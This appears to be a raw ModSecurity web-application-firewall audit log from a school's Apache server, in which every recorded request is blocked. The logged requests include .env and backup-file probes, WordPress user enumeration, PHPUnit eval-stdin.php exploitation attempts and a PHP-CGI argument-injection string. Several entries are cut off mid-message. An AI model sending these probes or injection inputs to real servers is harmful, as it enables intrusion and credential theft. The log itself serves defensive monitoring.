aCq9mWyGBQNQTJej4E6_bAAAAJQ 103.236.140.4 39872 103.236.140.4 8181 --5cdc520a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --5cdc520a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cdc520a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747631513139944 781 (- - -) Stopwatch2: 1747631513139944 781; combined=334, p1=297, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cdc520a-Z-- --a308096d-A-- [19/May/2025:12:11:53 +0700] aCq9mb8BMImlI6dyVeMECgAAAM4 103.236.140.4 39882 103.236.140.4 8181 --a308096d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --a308096d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a308096d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747631513282802 842 (- - -) Stopwatch2: 1747631513282802 842; combined=352, p1=316, p2=0, p3=0, p4=0, p5=36, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a308096d-Z-- --b9bd4c44-A-- [19/May/2025:12:18:16 +0700] aCq_GGyGBQNQTJej4E7D5wAAAJg 103.236.140.4 59694 103.236.140.4 8181 --b9bd4c44-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept-Charset: utf-8 --b9bd4c44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9bd4c44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747631896966282 825 (- - -) Stopwatch2: 1747631896966282 825; combined=350, p1=314, p2=0, p3=0, p4=0, p5=36, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9bd4c44-Z-- --58797703-A-- [19/May/2025:12:19:21 +0700] aCq_Wb8BMImlI6dyVeMK0gAAAM8 103.236.140.4 34770 103.236.140.4 8181 --58797703-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G935U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --58797703-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58797703-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747631961685273 956 (- - -) Stopwatch2: 1747631961685273 956; combined=434, p1=374, p2=0, p3=0, p4=0, p5=60, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58797703-Z-- --c5a6df29-A-- [19/May/2025:12:45:45 +0700] aCrFiWyGBQNQTJej4E7VAAAAAIY 103.236.140.4 59030 103.236.140.4 8181 --c5a6df29-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.243.205.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.243.205.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c5a6df29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5a6df29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747633545568321 2523 (- - -) Stopwatch2: 1747633545568321 2523; combined=1110, p1=358, p2=727, p3=0, p4=0, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5a6df29-Z-- --858fa807-A-- [19/May/2025:13:17:14 +0700] aCrM6gZaP57SewDBUi-xogAAAEk 103.236.140.4 33790 103.236.140.4 8181 --858fa807-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.198 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --858fa807-C-- --858fa807-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --858fa807-E-- --858fa807-H-- Message: Access denied with code 403 (phase 2). String match " --6f03c650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f03c650-E-- --6f03c650-H-- Message: Access denied with code 403 (phase 2). String match " --c12ddb07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c12ddb07-E-- --c12ddb07-H-- Message: Access denied with code 403 (phase 2). String match " --066b2570-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --066b2570-H-- Message: Access denied with code 403 (phase 2). String match " --8a793e7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a793e7a-E-- --8a793e7a-H-- Message: Access denied with code 403 (phase 2). String match " --67008712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67008712-E-- --67008712-H-- Message: Access denied with code 403 (phase 2). String match " --35e9c17c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e9c17c-H-- Message: Access denied with code 403 (phase 2). String match " --18cd2a00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18cd2a00-E-- --18cd2a00-H-- Message: Access denied with code 403 (phase 2). String match " --44073014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44073014-E-- --44073014-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747678384003118 4180 (- - -) Stopwatch2: 1747678384003118 4180; combined=2748, p1=523, p2=2191, p3=0, p4=0, p5=33, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44073014-Z-- --e836a02f-A-- [20/May/2025:01:45:15 +0700] aCt8O78BMImlI6dyVeN-HQAAAMk 103.236.140.4 38516 103.236.140.4 8181 --e836a02f-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 161.97.153.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 161.97.153.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; 1713-A01) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 Accept-Charset: utf-8 --e836a02f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e836a02f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747680315018835 13816 (- - -) Stopwatch2: 1747680315018835 13816; combined=25817, p1=378, p2=0, p3=0, p4=0, p5=12742, sr=141, sw=0, l=0, gc=12697 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e836a02f-Z-- --026c1817-A-- [20/May/2025:02:06:48 +0700] aCuBSGyGBQNQTJej4E57AQAAAIE 103.236.140.4 59166 103.236.140.4 8181 --026c1817-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; Vivo 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --026c1817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --026c1817-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747681608577062 884 (- - -) Stopwatch2: 1747681608577062 884; combined=402, p1=363, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --026c1817-Z-- --9849ef69-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEfgAAAME 103.236.140.4 58882 103.236.140.4 8181 --9849ef69-B-- GET /smkn22jakarta.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150044696 --9849ef69-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9849ef69-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200697943 2579 (- - -) Stopwatch2: 1747683200697943 2579; combined=1066, p1=568, p2=461, p3=0, p4=0, p5=37, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9849ef69-Z-- --49366863-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEgwAAAM8 103.236.140.4 58982 103.236.140.4 8181 --49366863-B-- GET /media.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162365449 --49366863-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --49366863-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200702356 2519 (- - -) Stopwatch2: 1747683200702356 2519; combined=1062, p1=512, p2=522, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49366863-Z-- --2fb8517f-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEhAAAAMM 103.236.140.4 58882 103.236.140.4 8181 --2fb8517f-B-- GET /archive.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:52.8.0) Gecko/20100101 Firefox/52.8.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 87334849 --2fb8517f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2fb8517f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200702471 2685 (- - -) Stopwatch2: 1747683200702471 2685; combined=879, p1=297, p2=555, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fb8517f-Z-- --4692140d-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEkAAAANY 103.236.140.4 58882 103.236.140.4 8181 --4692140d-B-- GET /php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161710101 --4692140d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4692140d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200710135 2561 (- - -) Stopwatch2: 1747683200710135 2561; combined=693, p1=347, p2=311, p3=0, p4=0, p5=34, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4692140d-Z-- --06cca272-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nZwAAAE4 103.236.140.4 59438 103.236.140.4 8181 --06cca272-B-- GET /wwwroot.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161153033 --06cca272-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --06cca272-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200712930 2419 (- - -) Stopwatch2: 1747683200712930 2419; combined=822, p1=359, p2=396, p3=0, p4=0, p5=66, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06cca272-Z-- --9804a842-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOElwAAAMM 103.236.140.4 58986 103.236.140.4 8181 --9804a842-B-- GET /files.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3; rv:52.4.1) Gecko/20100101 Firefox/52.4.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152797226 --9804a842-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9804a842-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200714155 1898 (- - -) Stopwatch2: 1747683200714155 1898; combined=692, p1=364, p2=301, p3=0, p4=0, p5=26, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9804a842-Z-- --d600f872-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5-7AAAAJY 103.236.140.4 59088 103.236.140.4 8181 --d600f872-B-- GET /store.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0.1) Gecko/20100101 Firefox/52.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149913630 --d600f872-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d600f872-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200714136 6832 (- - -) Stopwatch2: 1747683200714136 6832; combined=762, p1=356, p2=374, p3=0, p4=0, p5=31, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d600f872-Z-- --e2d43870-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5-5gAAAIU 103.236.140.4 59478 103.236.140.4 8181 --e2d43870-B-- GET /web.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 OPR/54.0.2952.51 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 148936201 --e2d43870-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e2d43870-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200716351 5619 (- - -) Stopwatch2: 1747683200716351 5619; combined=2592, p1=576, p2=1984, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2d43870-Z-- --54a6ae75-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonQQAAABQ 103.236.140.4 58856 103.236.140.4 8181 --54a6ae75-B-- GET /new.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 143614018 --54a6ae75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --54a6ae75-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against 